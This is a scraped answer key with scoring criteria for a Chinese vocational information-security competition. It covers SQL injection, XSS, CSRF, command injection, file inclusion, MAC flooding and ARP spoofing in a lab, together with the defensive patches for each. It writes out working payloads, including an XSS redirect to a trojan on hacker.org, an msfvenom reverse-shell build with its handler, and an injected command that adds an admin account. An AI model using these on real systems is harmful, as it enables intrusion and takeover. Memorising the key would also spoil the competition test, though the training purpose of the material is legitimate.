ImageVerifierCode 换一换
格式:DOCX , 页数:38 ,大小:1.92MB ,
资源ID:2089892      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bingdoc.com/d-2089892.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx)为本站会员(b****1)主动上传,冰点文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰点文库(发送邮件至service@bingdoc.com或直接QQ联系客服),我们立即给予删除!

高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx

1、高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准任务1:SQL注入攻防(55分)1.Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:Login Page找到提交的变量名(3分)提供以下变量:name=usernmname=passwd2.对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)构造注入语句:username:任意用户名password:含:or X=X(X为任意值)(3分)同时包含截图:1、通过任意用

2、户名登录(截图)2、登录成功页面(截图)(2分)3.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)(10分)包含语句:1、select password from users where username=$username2、if($obj-password=$password)4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并

3、将验证过程截图;(5分)同时包含截图:1、通过任意用户名登录(截图)2、登陆后,页面出现用户名不存在提示;(截图)(5分)5.Web继续访问DCST中的WebServ2003服务器,/-Employee Information Query,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)找到的源程序含有页面标题:Query找到提交的变量名(3分)name=usernm6.对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)(2分)输入“%”,返回所有用户信息(截图)输入“_”,返回所有用户信息(截图)(3分)7

4、.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:目录下的1.txt文档,并将注入代码及测试过程截图;(5分)构造注入语句:exec master.dbo.xp_cmdshell del c:1.txt-(5分)8.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)截图:在服务器场景QueryCtrl.php源程序语句:$keyWord=$_REQUESTuse

5、rnm之后加入:(10分)9.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。(5分)通过:exec master.dbo.xp_cmdshell del c:1.txt再次进行SQL注入截图;系统出现错误提示:Bad KeyWord!(截图)(5分)任务2:XSS和CSRF攻防(65分)1.Web访问DCST中的WebServ2003服务器,/- Employee Message Board,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)含有页面标题:Message Board找到提交的

6、变量名:(3分)name=MessageUsernamename=message2.对该任务题目1页面注入点进行XSS渗透测试,并进入/- Employee Message Board-Display Message页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)构造注入代码:(2分)while(1)alert(Hacker!);测试注入成功:(3分)弹出alert(Hacker!)括号中的消息;3.对该任务题目1页面注入点进行渗透测试,使/- Employee Message Board-Display Message页面的访问者执行网站(http:/hacker.org/)

7、中的木马程序:http:/hacker.org/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)构造注入代码:(2分) location.href=http:/hacker.org/TrojanHorse.exe; 测试过程:(3分)名称:trojanhorse.exe发送者:hacker.org4.通过IIS搭建网站(http:/hacker.org/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(http:/hacker.org/)的WWW根目录下,并将搭建该网站结果截图;(5分)搭建IIS(1分)Internet信息服务:网站目录下存

8、放:trojanhorse.exe搭建DNS(1分)正向查找区域:主机(截图)Zone:Org主机:hackerMetasploit Framework:TrojanHorse.exe生成 (3分)rootbt:#Ifconfig(截图)显示Kali IP地址:X.X.X.X截图包含:rootbt:#msfvenom p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=80 f exe o trojanhorse.exe5.当/- Employee Message Board-Display Message页面的访问者执行网站(http:

9、/hacker.org/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)rootbt:#msfconsolemsf use exploit/multi/handler msf exploit(handler) set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD = windows/meterpreter/reverse_tcp msf e

10、xploit(handler) set LHOST X.X.X.X LHOST = X.X.X.X msf exploit(handler) set LPORT 80 LPORT = 80 msf exploit(handler) exploit * Started reverse handler on X.X.X.X:80 * Starting the payload handler. (截图中包含黄色部分)访问者主机需要被Kali主机远程控制(3分)Kali MSF提示(截图)包含如下信息Kali IP:X.X.X.X访问者主机IP:Y.Y.Y.Y* Sending stage ( byt

11、es) to Y.Y.Y.Y * Meterpreter session 1 opened (X.X.X.X:Port1 - Y.Y.Y.Y:Port2) at meterpreter Kali截图包含打开访问者主机的CMD.exe命令行窗口;6.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分)(10分)在服务器场景原insert.php程序语句$info=$_REQUESTmessage后加入:绿色部分,通过替换函数,通

12、过其它字符(,(),等字符)替换字符“”均可得分;$info=str_replace(“”,”)”,$info);或$info=str_replace(“”,” ”,$info);或$info=str_replace(“”,” ”,$info);7.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)SQL Server企业管理器中,Message表中info字段注入语句符号“”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“”

13、被替换为上一题替换后的字符;(5分)8.Web访问DCST中的WebServ2003服务器,/- Shopping Hall,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题为:Shopping Hall找到提交的变量名:(3分)goods=keyboard&quantity=1goods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=19.对该任务题目1页面注入点进行渗透测试,使/- Employe

14、e Message Board-Display Message页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看/-PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分)构造注入代码:(2分) document.location=http:/X.X.X.X/ShoppingProcess.php?goods=cpu&quantity=999999; WebServer IP:X.X.X.X测试过程:(3分)截图:Goods:CPU-数值大于或等于99999910.进入DCST中的WebServ2003

15、服务器的C:AppServwww目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)截图:服务器场景DisplayMessage.php程序语句:echo “Content:”.”$obj-info”.”替换为:echo “Content:”.strip_tags(”$obj-info”).”(10分)11.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)(5分)得分点:直接

16、显示代码信息,而不是将代码执行;(截图)SQL Server企业管理器中,Message表中info字段注入语句含有标记;同时Communication Message页面显示Content:注入语句不含有标记;任务3:命令注入与文件包含攻防(50分)1.Web访问DCST中的WebServ2003服务器,/- Display Directory,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:Display C:s Directory找到提交的变量名:(3分)name=directory2.对该任务题目1页面注入点进行渗透测试,使页面DisplayDirec

17、toryCtrl.php回显C:Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分)注入语句:(2分)WINDOWS | net user Hacker Pssword /addWINDOWS | net localgroup administrators Hacker /add测试成功:(3分)截图:含有:命令成功完成。3.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以

18、抵御命令注入渗透测试,并将修改后的源程序截图;(10分)(10分)包含语句:$str=|if(strstr($directory,$str)=false)4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;含有本任务第2题的命令注入语句;WINDOWS | net user Hacker Pssword /addWINDOWS | net localgroup administrators Hacker

19、/add截图2:页面出现非法输入提示;含有本任务题目3修改后代码中的错误提示信息;本案例提示信息为:illegal input!(5分)5.Web访问DCST中的WebServ2003服务器,/- Display Uploadeds File Content,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:Display Uploads File Content找到提交的变量名:(3分)name=filename6.对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:App

20、Serv/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分)构造注入代码:(2分).AppServApache2.2logsaccess.log回显DCST中的WebServ2003服务器访问日志文件:显示出AppServ/Apache2.2/logs/access.log的内容:(3分)Internet Explorer地址栏中须含有:DisplayFileCtrl.php?filename=7.进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并

21、修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)(10分)包含语句:$str=.if(strstr($directory,$str)=false)8.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。(5分)截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;输入框含有本任务题目6的注入代码:.AppServApache2.2logsaccess.log截图2:页面出现非法输入提示;含有本任务题目7修改后代码中的错误提示信息;本案例

22、提示信息为:illegal input!(5分)任务4:数据窃取防护:二层攻防(45分)1.将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。(2分)截图:PC1、Kali、DCST同在VLAN10;(#show vlan)VLAN10中包含的接口数=3;WebServer IP配置(与参数表中服务器场景的IP地址一致):PC1 IP地址配置(与参数表中PC1的IP地址一致):PC3 IP地址配置(与参数表中

23、PC3的IP地址一致):三个终端之间能够相互Ping通;在同一个窗口ping通除了本机外的2个IP地址;2.查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。(3分)#show mac-address-table count vlan 10DCRS地址表空间中有可用的空间;当前地址表记录数少于地址表容量;Max entiresTotal:16384Current entiresTotal:该数值小于103.从Kali发起MAC Flooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC

24、1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。(5分)Kali#macof(2分)#show mac-address-table count vlan 10当前地址表记录数等于地址表容量;Max entiresTotal:16384Current entiresTotal:该数值=16384(3分)4.Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。(5分)PC1通过Internet Expl

25、orer访问;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/Kali打开wireshark,监听到PC1通过Internet Explorer访问DCST服务器场景的HTTP流量;截图:Source:PC1的IP地址(与参数表一致)Destination:服务器场景的IP地址(与参数表一致)Protocol:HTTP(5分)5.在DCRS交换机Kali所连接端口配置Port Security特性,阻止Kali发起MAC Flooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置

26、信息以及验证信息截图。(8分)配置截图包含:mac-address-learning cpu-control (2分)在VLAN10每个接口全部启用如下:Interface Ethernet1/0/Xswitchport port-security(2分)#clear mac-address-table dynamic(2分)#show mac-address-table count vlan 10DCRS地址表空间中有可用的空间;当前地址表记录数少于地址表容量;Max entiresTotal:16384Current entiresTotal:该数值小于10(2分)6.在DCRS交换机配置

27、Port Security特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。(7分)PC1通过Internet Explorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/Kali打开wireshark,监听不到PC1通过Internet Explorer访问DCST的HTTP流量;(截图)Filter:http显示报文数:空任务5:数据窃取防护:ARP攻防(45分)1.在PC1访问DCST

28、中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。(5分)PC1、WebServ2003Ipconfig/all分别显示PC1、WebServ2003的IP和MAC;PC1的IP和MAC:服务器场景的IP和MAC:PC1通过Internet Explorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/PC1:ARP表项内容为WebServ2003的IP-WebServ2003的真实的MAC;WebServ2003:ARP表项内容为

29、PC1的IP- PC1的真实的MAC;2.在Kali对PC1进行ARP Spoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:DCST中的WebServ2003服务器IP-Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。(5分)Kali:#arpspoof t PC1_IP WebServ2003_IP(过程截图)(2分)PC1:ARP表项内容为WebServ2003的IP-Kali的MAC;Kali MAC:ifconfig(截图)(3分)3.在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用w

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2